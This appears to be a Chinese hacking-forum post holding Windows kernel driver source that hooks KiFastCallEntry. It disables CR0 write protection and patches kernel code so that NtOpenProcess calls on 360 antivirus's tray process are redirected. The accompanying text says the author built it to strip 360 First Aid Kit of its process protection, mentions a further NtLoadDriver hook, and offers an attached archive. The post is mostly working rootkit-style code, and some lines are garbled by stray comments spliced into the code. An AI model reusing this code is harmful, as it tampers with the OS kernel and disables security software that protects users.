#include <ntddk.h>
#define BYTE unsigned char
#define MEM 'viphac'
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
);
VOID Unload(
IN PDRIVER_OBJECT DriverObject
);
typedef NTSTATUS (*NTOPENPROCESS)(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK AccessMask,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId
);
NTSTATUS PsLookupProcessByProcessId(
IN HANDLE ProcessId,
OUT PEPROCESS *Process
);
PUCHAR PsGetProcessImageFileName(
IN PEPROCESS EProcess
);
#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, Unload)
#endif
NTOPENPROCESS OldNtOpenProcess;
BYTE JmpCode[5]={0xE9,0x00,0x00,0x00,0x00};
BYTE OrgCode[5]={0x8B,0x3F,0x8B,0x1C,0x87};
BYTE PushRetCode[6]={0x68,0x00,0x00,0x00,0x00,0xc3};
ULONG uKiFastCallEntryAddr=0;
ULONG HookAddr=0;
ULONG JMPRet=0;
ULONG PushRetMem=0;
//NtOpenProcess
NTSTATUS MyNtOpenProcess(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK AccessMase,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId
)
{
PEPROCESS lpPEPROCESS;
NTSTATUS status;
char *ProcessName;
//取要打开目标进程的PEPROCESS
status=PsLookupProcessByProcessId(ClientId->UniqueProcess,&lpPEPROCESS);
if (NT_SUCCESS(status))
{
if (KeGetCurrentIrql()==PASSIVE_LEVEL)
{
ProcessName=_strupr(PsGetProcessImageFileName(lpPEPROCESS));
if (strcmp(ProcessName,"360tray.EXE")==0) //判断打开的进程是否为
如果是 返回0 即 拒绝访问 不是CALL回去
{
return STATUS_ACCESS_DENIED;
}
}
}
return OldNtOpenProcess(ProcessHandle,AccessMase,ObjectAttributes,ClientId);
}
//HOOK KiFastCallEntry
__declspec(naked)void OverFuck()
{
_asm
{
pushfd
pushad
mov edi,dword ptr [edi]
mov ebx,dword ptr [edi+eax*4]
cmp OldNtOpenProcess,ebx; //比较是否为NtOpenProcess
je Label1
popad
popfd
mov edi,dword ptr [edi]
mov ebx,dword ptr [edi+eax*4]
jmp [JMPRet];
Label1:
popad
popfd
mov ebx,MyNtOpenProcess
jmp [JMPRet];
}
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
NTSTATUS status = STATUS_SUCCESS;
KIRQL oldIrql;
UNICODE_STRING ustrFunctionName;
DbgPrint("[HideSSDT] DriverEntry!\n");
DriverObject->DriverUnload = Unload;
RtlInitUnicodeString(&ustrFunctionName, L"NtOpenProcess" );
OldNtOpenProcess=(NTOPENPROCESS)MmGetSystemRoutineAddress( &ustrFunctionName);
DbgPrint("NtOpenProcess=0x%08X",OldNtOpenProcess);
__asm
{
pushfd
pushad
mov ecx,0x176
rdmsr
mov uKiFastCallEntryAddr,eax
xor ecx,ecx //RDMSR ; 特权命令 Label1:
cmp ecx,0x100
je Label3
mov edx,DWORD ptr [eax]
cmp edx,0x1C8B3F8B
je Label2
inc eax
inc ecx
jmp Label1
Label2:
mov HookAddr,eax
Label3:
popad
popfd
}
if (HookAddr==0)
{
return status;
}
//申请分配二级跳转内存
PushRetMem=(ULONG)ExAllocatePoolWithTag(NonPagedPool,6,MEM);
if ((PVOID)PushRetMem==NULL)
{
return status;
}
DbgPrint("PushRetMem=0x%08X",PushRetMem);
//一级跳转地址
*(ULONG*)&JmpCode[1]=(ULONG)(PushRetMem)-(HookAddr+5);
//二级跳转地址
*(ULONG*)&PushRetCode[1]=(ULONG)OverFuck;
//HOOK返回地址
JMPRet=HookAddr+5;
//提升中断请求级
oldIrql = KeRaiseIrqlToDpcLevel();
//关闭中断
_asm
{
CLI 清中断允许位
MOV EAX, CR 0
AND EAX, NOT 10000H
MOV CR0, EAX
}
//进行HOOK操作
RtlCopyMemory((PVOID)PushRetMem,PushRetCode,6);
RtlCopyMemory((PVOID)HookAddr,JmpCode,5);
//开启中断
_asm
{
MOV EAX, CR0
OR EAX, 10000H
MOV CR0, EAX
STI 置中断允许位
}
//恢复先前中断请求级
KeLowerIrql(oldIrql);
//添加代码
return status;
}
VOID Unload( IN PDRIVER_OBJECT DriverObject)
{
if (HookAddr!=0)
{
KIRQL oldIrql;
//提升中断请求级
oldIrql = KeRaiseIrqlToDpcLevel();
//关闭中断
_asm
{
CLI
MOV EAX, CR0
AND EAX, NOT 10000H
MOV CR0, EAX
}
//进行还原HOOK操作
RtlCopyMemory((PVOID)HookAddr,OrgCode,5);
_asm
{
MOV EAX, CR0
OR EAX, 10000H
MOV CR0, EAX
STI
}
//恢复先前中断请求级
KeLowerIrql(oldIrql);
// 释放内存
ExFreePool((PVOID)PushRetMem);
}
网上也看了 很多帖子 我晕啊!!
C语言支持 直接 汇编 而E语言却要 转换成10进制 饿 处理相当麻烦
这个事我开学时候写的驱动:360玩的太绝 一直更新偶的驱动 麻麻呼呼 还有很多没有解决 感兴趣的朋友玩玩吧! 吧里面的功能全部挖出来 [ATTACH][ATTACH][ATTACH 不过360急救箱确实有一个问题 如果第一次加载失败了 第二次即使被成功加载
进程也不会得到保护
NtLoadDriver 请在虚拟机中测试 这个NtLoadDriver 我只写了HOOK 请手动恢复 自备XueTr 先让360急救箱允许 在结束 恢复 NtLoadDriver 在运行看看 360失去了 进程隐藏+进程保护 即使驱动被加载 [ATTACH] viphack.zip [/ATTACH]
邀请码 邀请码 给我!!!!! 谢谢啊 我要加入 看雪BBS成为你们中间的一员
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
上传的附件: